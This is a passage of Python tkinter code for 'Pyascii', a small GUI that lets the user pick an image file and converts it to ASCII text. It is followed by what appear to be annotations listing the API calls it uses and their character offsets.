#initalize myFile instance variable
self.myFile = None
self.saveFile = None
#set window height
master.minsize(height = 440, width = 680)
#create frame
frame = Frame(master)
frame.pack()
#first label
self.labelTop = Label(frame, text="Choose an image file!", font=("Arial", 12))
self.labelTop.pack()
#first button
self.buttonTop = Button(frame, text="Choose file", fg="blue", width = 10, command = self.chooseImageFile)
self.buttonTop.pack()
#second label
self.labelMid = Label(frame,
text="The ascii text file will be saved in the same directory as the image.\n"
"If your image name was foo.jpg, the text file will be foo.txt",
font=("Arial", 12))
self.labelMid.pack()
#second button
self.buttonMid = Button(frame, text="Pyascii!", fg="green", width = 10, command=self.pyascii)
self.buttonMid.pack()
def chooseImageFile(self):
self.myFile = filedialog.askopenfilename(parent = root, title='Choose your picture!')
while self.verifyFileExtension() is False:
self.myFile = filedialog.askopenfilename(parent = root, title='Invalid file!')
def pyascii(self):
main(self.myFile)
def verifyFileExtension(self):
if self.myFile is None:
return False
else:
validExtensions = ["jpeg", "jpg", "bmp", "png"]
result = False
for extension in validExtensions:
if self.myFile.endswith(extension):
result = True
return result
root=Tk()
root.wm_title("Pyascii")
app = App(root)
root.mainloop() | [
"pyascii.main",
"tkinter.filedialog.askopenfilename"
] | [((1046, 1115), 'tkinter.filedialog.askopenfilename', 'filedialog.askopenfilename', ([], {'parent': 'root', 'title': '"""Choose your picture!"""'}), "(parent=root, title='Choose your picture!')\n", (1072, 1115), False, 'from tkinter import filedialog\n'), ((1285, 1302), 'pyascii.main', 'main', (['self.myFile'], {}), '(self.myFile)\n', (1289, 1302), False, 'from pyascii import main\n'), ((1184, 1246), 'tkinter.filedialog.askopenfilename', 'filedialog.askopenfilename', ([], {'parent': 'root', 'title': '"""Invalid file!"""'}), "(parent=root, title='Invalid file!')\n", (1210, 1246), False, 'from tkinter import filedialog\n')] |